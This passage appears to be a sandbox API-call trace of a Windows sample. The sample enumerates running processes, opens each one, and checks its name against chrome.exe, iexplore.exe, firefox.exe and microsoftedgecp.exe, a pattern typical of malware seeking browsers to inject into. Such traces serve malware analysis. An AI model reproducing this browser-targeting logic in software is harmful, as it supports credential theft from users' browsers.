	[0194.666] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0194.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xcf8
	[0194.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.667] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0194.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.667] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.668] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0194.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.668] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.668] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xcfc
	[0194.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.669] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.669] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.669] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.670] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.670] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.670] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xd00
	[0194.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.671] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.671] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.671] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.672] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.672] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xd04
	[0194.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.673] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.673] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.673] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.674] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.674] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.675] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xd08
	[0194.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.675] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.675] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.675] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.676] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.676] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xd0c
	[0194.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.677] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.677] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.677] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.678] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.678] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xd10
	[0194.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.679] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.679] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.679] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.679] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.680] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xd14
	[0194.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.681] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.681] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.681] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.682] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.682] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0194.683] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xd18
	[0194.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.683] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0194.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.683] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.684] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0194.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.684] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.684] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.685] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xd1c
	[0194.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.685] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.685] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.686] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.686] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.686] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0194.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xd20
	[0194.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.687] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.687] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.688] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.688] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.688] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0194.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xd24
	[0194.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.690] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0194.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.690] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.690] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0194.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.691] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.691] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xd28
	[0194.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.692] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.692] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.692] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.693] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.693] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0194.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xd2c
	[0194.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.694] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0194.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.694] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.694] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0194.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.695] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.695] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0194.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xd30
	[0194.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.696] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0194.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.696] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.697] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0194.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.697] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.697] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0194.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xd34
	[0194.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.698] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0194.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.698] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.698] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0194.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.699] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.699] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0194.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xd38
	[0194.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.700] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0194.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.700] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.700] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0194.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.701] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.701] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0194.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0194.702] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0194.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xd3c
	[0194.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.702] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0194.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.703] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.704] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0194.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.705] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.705] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0194.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xd40
	[0194.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.706] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0194.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.706] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.706] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0194.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.707] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.707] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0194.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xd44
	[0194.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.708] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0194.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.708] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.708] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0194.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.709] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.709] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0194.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xd48
	[0194.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.710] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0194.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.710] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.710] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0194.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.711] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.711] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0194.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xd4c
	[0194.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.712] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0194.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.712] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.713] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0194.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.713] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.714] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0194.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xd50
	[0194.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.714] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0194.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.715] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.715] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0194.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.715] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.715] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0194.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xd54
	[0194.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.716] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0194.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.716] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.717] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0194.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.717] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.718] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0194.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xd58
	[0194.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.718] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
